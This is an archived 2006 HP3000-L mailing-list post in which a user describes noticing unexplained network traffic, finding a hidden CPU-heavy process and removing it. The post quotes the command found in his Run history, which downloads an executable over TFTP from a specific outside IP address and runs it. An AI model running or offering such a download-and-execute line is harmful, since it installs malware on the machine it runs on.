LISTSERV - HP3000-L Archives

HP3000-L Archives

December 2006, Week 2

HP3000-L@RAVEN.UTC.EDU

	LISTSERV Archives
	HP3000-L Home
	HP3000-L December 2006, Week 2

	Log In
	Register

	Subscribe or Unsubscribe

	Search Archives

Options:	Use Monospaced Font Show Text Part by Default Show All Mail Headers
Message:	[<< First] [< Prev] [Next >] [Last >>]
Topic:	[<< First] [< Prev] [Next >] [Last >>]
Author:	[<< First] [< Prev] [Next >] [Last >>]

Subject:	OT: Did I get hacked?
From:	Craig Lalley <[log in to unmask]>
Reply To:	Craig Lalley <[log in to unmask]>
Date:	Thu, 14 Dec 2006 19:42:52 -0800
Content-Type:	text/plain
Parts/Attachments:	text/plain (29 lines)

I generally keep a good eye on my computer.

Today I noticed that network packets were leaving my PC, without my understanding why.

I turned off all processes, that could be communicating.  I even looked at my Mcafee firewall, but nothing was identified.

My task manager showed no processes that were unknown.

I found this in my run commands drop down box.
%comspec% /c tftp -i 66.36.241.146 GET pke.exe & start pke

So, I downloaded process explorer from www.sysinternals.com.    

And low and behold there was a hidden process pke, consuming 49% of the CPU (think hyperthreading).  I was able to kill it, and find the offending program and remove it.

Has anyone seen anything like this before?

TIA,

-Craig


 
---------------------------------
Everyone is raving about the all-new Yahoo! Mail beta.

* To join/leave the list, search archives, change list settings, *
* etc., please visit http://raven.utc.edu/archives/hp3000-l.html *

ATOM RSS1 RSS2

RAVEN.UTC.EDU